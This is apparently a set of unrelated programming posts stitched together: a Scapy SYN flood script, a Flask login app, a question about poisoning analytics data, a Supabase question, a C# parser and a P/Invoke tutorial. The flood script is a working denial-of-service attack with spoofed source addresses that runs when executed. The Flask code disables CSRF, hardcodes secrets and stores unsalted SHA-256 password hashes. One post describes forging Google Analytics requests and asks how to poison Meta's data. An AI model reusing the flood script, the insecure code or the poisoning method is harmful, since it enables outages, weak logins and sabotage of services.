Hello,

I am thinking about teaching my students JavaScript first so that they can start creating websites and make their career, what are your thoughts?

I know it's very old now but I still didn't know about this kind of low level attack. I don't even know if it works or not but I still found it interesting.

from scapy.all import *
import random

target_ip = "192.168.1.1"
target_port = 80

def syn_flood():
    while True:
        # Randomize source IP and port
        src_ip = ".".join(map(str, (random.randint(0,255) for _ in range(4))))
        src_port = random.randint(1024, 65535)
        
        ip = IP(src=src_ip, dst=target_ip)
        tcp = TCP(sport=src_port, dport=target_port, flags="S")
        
        send(ip/tcp, verbose=0)

syn_flood()  # Uncomment to run (requires proper authorization)

Hello,

it seems like an easy question but I tried everything google and AI told me but flask still giving me CSRF token mismatched error. I don't know how to disable it. I threw everything I found online to disable CSRF but I can't disable it. it's so annoying. here is the code:

import mysql.connector
from mysql.connector import Error

from flask import Flask, request, jsonify,redirect, url_for
from authlib.integrations.flask_client import OAuth
import os
from flask_cors import CORS
from flask_jwt_extended import JWTManager, create_access_token, jwt_required, get_jwt_identity
# from flask_wtf.csrf import csrf_exempt

import hashlib
from flask import Flask
from flask_wtf import CSRFProtect

app = Flask(__name__)
app.config['WTF_CSRF_ENABLED'] = False  # Disable CSRF globally

csrf = CSRFProtect(app)  # This will now be disabled


try:
    print("TESTING CONNECTION TO MYSQL DATABASE...")
    connection = mysql.connector.connect(
        host='localhost',
        database='test',
        user='root',
        password='MySql@123'
    )

    if connection.is_connected():
        print("Connected to MySQL database")

        cur = connection.cursor()
        cur.execute("SELECT DATABASE();")
        record = cur.fetchone()
        print("You're connected to database: ", record)
except Error as e:
    print("Error while connecting to MySQL", e)
    exit(1)
finally:
    if connection.is_connected():
        cur.close()
        connection.close()
        print("MySQL connection is closed")
        print("TESTING DONE")


app.secret_key = "somethings_secret92387492837492387498"
app.config['SESSION_COOKIE_SAMESITE'] = 'Lax'
app.config['SESSION_COOKIE_SECURE'] = False
app.config['SESSION_COOKIE_HTTPONLY'] = True

CORS(app)
app.config['JWT_SECRET_KEY'] = "your_jwt_secret_key123487236428374628374628736"
jwt = JWTManager(app)


# OAuth configuration
oauth = OAuth(app)
google = oauth.register(
    name='google',
    client_id="CLIENT_ID",
    client_secret="CLIENT_SECRET",
    server_metadata_url='https://accounts.google.com/.well-known/openid-configuration',
    client_kwargs={
        'scope': 'openid email profile'
    }
)

@app.errorhandler(Exception)
def handle_exception(e):
    return jsonify({"error": str(e)}), 500

@app.route("/",)
@jwt_required()
def hello_world():
    return "<p>Hello, World!</p>"

@app.route("/register_by_email", methods=["POST"])
def register():
    username = request.form.get("username")
    email = request.form.get("email")
    password = request.form.get("password")

    with mysql.connector.connect(
        host='localhost',
        database='test',
        user='root',
        password='MySql@123'
    ) as connection:
        with connection.cursor() as cursor:
            cursor.execute("INSERT INTO users (username, email) VALUES (%s, %s)", (username, email))
            cursor.execute("SELECT LAST_INSERT_ID()")
            user_id = cursor.fetchone()[0]
            password_hash = hashlib.sha256(password.encode()).hexdigest()
            cursor.execute("INSERT INTO user_passwords (user_id, password_hash) VALUES (%s, %s)", (user_id, password_hash))
            connection.commit()
    return jsonify({"message": "User registered successfully", "user_id": user_id}), 201

@app.route("/login_by_email", methods=["POST"])
def login():
    email = request.form.get("email")
    password = request.form.get("password")

    with mysql.connector.connect(
        host='localhost',
        database='test',
        user='root',
        password='MySql@123'
    ) as connection:
        with connection.cursor() as cursor:
            cursor.execute("SELECT id FROM users WHERE email = %s", (email,))
            user = cursor.fetchone()
            if not user:
                return jsonify({"error": "User not found"}), 404
            user_id = user[0]
            password_hash = hashlib.sha256(password.encode()).hexdigest()
            cursor.execute("SELECT * FROM user_passwords WHERE user_id = %s AND password_hash = %s", (user_id, password_hash))
            if cursor.fetchone():
                return jsonify({"message": "Login successful", "user_id": user_id, "access_token": create_access_token(identity=email)}), 200
            else:
                return jsonify({"error": "Invalid credentials"}), 401


@app.route("/google_oauth_url",methods = ["GET"])
def login_with_google():
    redirect_uri = url_for('callback', _external=True)
    return google.create_authorization_url(redirect_uri)




@app.route("/callback",methods = ["GET"])
# @csrf_exempt
def callback():
    token = google.authorize_access_token()
    user_info = token.get("userinfo")

    return jsonify(user_info)

if __name__ == "__main__":
    app.run(debug=True)

Hello,

yes, I use Instagram even though I don’t like it because well all of my friends does and I can’t convince them to use something else. it’s really sad how hard it is to convince people to join open networks specially in fascist country like India where people are just boot lickers of politicians and rich people. but I digress.

I found the other day that google analytics can be easily tricked since it doesn’t verify the input. you can just open network tab and watch for any request going to https://www.google-analytics.com/ and just copy that request as curl command now you can tweak the parameters of the query and it will just accept it. ig, you can say I have 1920x1080 monitor and google will just accept it. it’s an effective way to fill up google analytics with garbage data to the point that it’s harder to separate real data from the garbage data.

now I want to know if there is something similar to poison data of Instagram/Facebook/Meta. I opened network tab on instagram but couldn’t find anything interesting.

any help would be appreciated! :)

Hello,

recently I was working on a project entirely made by AI. at first it looked plausible but as I dig deeper into the code I found out ton of security issues. we solved the security issues one by one. ( thankfully the site isn't released yet and only have beta testing users )

my question is that is it considered a security issue if I let the client ( browser ) make the supabase api call instead of routing those requests through the backend ( vercel ) even when I have made policies that prevents unauthorized users from submitting INSERT queries however I am still not sure if this is enough.

one thing that comes in my mind is that any authorized user can just spam the database and fill it with junk data but I think I can just ban that user and delete all the junk data relatively easily using a SQL query?

the thing is that I don't want to refactor AI code and make it "use server" instead of "use client". since I have to make a ton of changes and I am still learning Nextjs. ( thinking about using AI to fix AI code but I don't think it will work and don't want more AI slop in the codebase )

any suggestions are appreciated!

Hello o/

I was experimenting with writing a language implementation so bump into this new thing called "recursive descent parser" at first it seemed complex but as I programmed it everything magically worked. I will attach the code tell me if I am wrong somewhere.

namespace ContextFreeGrammarDemo
{
    static class Parser
    {
        static string code = "aaaabbbb";
        static int cursor = 0;

        public static void Parse()
        {
            if (cursor >= code.Length)
                return;
            char currentChar = code[cursor];

            if (currentChar == 'a')
            {
                Console.WriteLine("a");
                cursor++;
                Parse();
                if (cursor < code.Length && code[cursor] == 'b')
                {
                    Console.WriteLine("b");
                    cursor++;
                    Parse();
                }
                else
                {
                    Console.WriteLine("Oopsie");
                    Environment.Exit(1);
                }
            }
        }
    }
    class Program
    {
        public static void Main(string[] args)
        {
            Parser.Parse();
        }
    }
}

This is my personal site where I will upload c sharp content, I hope you will like it :)

Platform Invoke (P/Invoke)

P/Invoke is a technology that allows you to call c/c++ function or function from a dll library from your managed code. It's divided into two namespace System and System.Runtime.InteropServices. you only need these namespaces to call external c/c++ function.

why do we need to call c/c++ function inside c#

• It's more efficient than writing your own in c#
• decreases code repetition

Windows Example

Here is an example of how you can use P/Invoke to call function from user32.dll.

using System;
using System.Runtime.InteropServices;

public partial class Program
{
    // Import user32.dll (containing the function we need) and define
    // the method corresponding to the native function.
    [LibraryImport("user32.dll", StringMarshalling = StringMarshalling.Utf16, SetLastError = true)]
    private static partial int MessageBoxW(IntPtr hWnd, string lpText, string lpCaption, uint uType);

    public static void Main(string[] args)
    {
        // Invoke the function as a regular managed method.
        MessageBoxW(IntPtr.Zero, "Command-line message box", "Attention!", 0);
    }
}

what happening in the snippet:

• we have imported System and System.Runtime.InteropServices which contains the necessary attributes to call a function in a dll file.
• the library user32.dll will be loaded at runtime and it will complete the implementation of MessageBoxW function. ( for those of who don't know what the function do: it's just showing a prompt to the user). keep in mind that this example is windows specific, it will not work on Linux or MacOS.
• you have probably noticed that we doing StringMarshalling. ( Marshalling is the process of transforming types when they need to cross between c# to native code (c/c++ or dll))
• you must define the c# function with the same signature of the c counterpart.

MacOS Example

using System;
using System.Runtime.InteropServices;

namespace PInvokeSamples
{
    public static partial class Program
    {
        // Import the libSystem shared library and define the method
        // corresponding to the native function.
        [LibraryImport("libSystem.dylib")]
        private static partial int getpid();

        public static void Main(string[] args)
        {
            // Invoke the function and get the process ID.
            int pid = getpid();
            Console.WriteLine(pid);
        }
    }
}

• In the example we are loading libSystem.dylib library and calling a getpid() function inside that library.

Linux example

using System;
using System.Runtime.InteropServices;

namespace PInvokeSamples
{
    public static partial class Program
    {
        // Import the libc shared library and define the method
        // corresponding to the native function.
        [LibraryImport("libc.so.6")]
        private static partial int getpid();

        public static void Main(string[] args)
        {
            // Invoke the function and get the process ID.
            int pid = getpid();
            Console.WriteLine(pid);
        }
    }
}

Invoking managed code from unmanaged code

c# allows us to pass a callback function to unmanaged code which will be called when a particular event gets triggered. The closes thing to a function pointer in managed code is a delegate. keep in mind that you have to create the delegate which has the same signature as expected in the dll function.

Here is an example:

using System;
using System.Runtime.InteropServices;

namespace ConsoleApplication1
{
    public static partial class Program
    {
        // Define a delegate that corresponds to the unmanaged function.
        private delegate bool EnumWC(IntPtr hwnd, IntPtr lParam);

        // Import user32.dll (containing the function we need) and define
        // the method corresponding to the native function.
        [LibraryImport("user32.dll")]
        private static partial int EnumWindows(EnumWC lpEnumFunc, IntPtr lParam);

        // Define the implementation of the delegate; here, we simply output the window handle.
        private static bool OutputWindow(IntPtr hwnd, IntPtr lParam)
        {
            Console.WriteLine(hwnd.ToInt64());
            return true;
        }

        public static void Main(string[] args)
        {
            // Invoke the method; note the delegate as a first parameter.
            EnumWindows(OutputWindow, IntPtr.Zero);
        }
    }
}

I hope you learned something new today!